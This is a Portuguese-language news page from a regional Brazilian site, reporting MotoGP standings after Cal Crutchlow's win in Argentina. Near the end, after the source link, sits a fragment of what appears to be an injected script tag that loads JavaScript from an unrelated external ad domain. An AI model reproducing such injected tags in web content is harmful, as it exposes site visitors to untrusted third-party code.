MotoGP

Últimas notícias

Guerra Mundial: entenda riscos de conflito entre Israel e Irã

O risco de uma nova guerra mundial existe caso...

Parada 120 – Hamburgueria artesanal em Três Barras

Conheça o melhor delivery de hambúrgueres artesanais de Três...

Senado aprova isenção de IR para quem ganha até dois salários mínimos

O Senado aprovou nesta quarta-feira (17) o projeto de...

Segunda etapa aconteceu no domingo dia 08/04 (Rio Hondo) na ARGENTINA Número Voltas: 24 Distância: 4,806 km Desenho do traçado:

 

 

 

 

Crutchlow aproveita corrida tumultuada na Argentina e toma liderança da MotoGP. Confira classificação.

Com a vitória no GP da Argentina deste fim de semana, Cal Crutchlow assumiu a liderança do Mundial de Pilotos com três pontos de vantagem para Andrea Dovizioso. A Honda lidera a disputa entre os Construtores, com a LCR na frente da briga entre Equipes.

O GP da Argentina provocou uma mudança inesperada na classificação da MotoGP. Depois da vitória na tumultuada prova deste domingo (8) em Termas de Río Hondo, Cal Crutchlow tomou a liderança do Mundial, enquanto Marc Márquez despencou para o quinto lugar. Com os 25 pontos conquistados em Santiago Del Estero, Crutchlow chegou aos 38 e agora lidera a disputa com três de frente para Andrea Dovizioso, o segundo colocado. Johann Zarco assumiu a terceira colocação, seguido por Maverick Viñales.

 

 

 

 

 

 

Agora com 18 pontos de atraso para o líder, Márquez ocupa o quinto posto, seguido por Jack Miller e Danilo Petrucci. Derrubado pelo #93, Valentino Rossi não pontuou na Argentina e caiu para a oitava posição, à frente de Álex Rins, que conseguiu o primeiro pódio na MotoGP.

Dani Pedrosa também não pontuou e tem o 12º lugar na tabela. Jorge Lorenzo, por sua vez, tem um único ponto e é o 20º na classificação.

Mundial de Construtores

Com a vitória de Cal Crutchlow, a Honda somou 25 pontos na disputa de Construtores e lidera a classificação com sete de frente para a Ducati. A Yamaha tem a terceira posição, à frente de Suzuki, KTM e Aprilia.

 

 

 

 

 

 

Mundial de Equipes

A LCR foi a equipe que melhor se saiu em Termas de Río Hondo. Com os 25 pontos de Crutchlow e os três de Takaaki Nakagami, a equipe de Lucio Cecchinello tomou a liderança do Mundial de Equipes, quatro pontos à frente da Tech3. Yamaha vem na sequência, seguida por Ducati, Pramac, Suzuki, Honda, Avintia, Marc VDS, KTM, Aprilia e Ángel Nieto.

 

 

 

http://www.grandepremio.com.br/motogp/noticias/crutchlow-aproveita-corrida-tumultuada-na-argentina-e-toma-lideranca-da-motogp-confira-classificacao… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.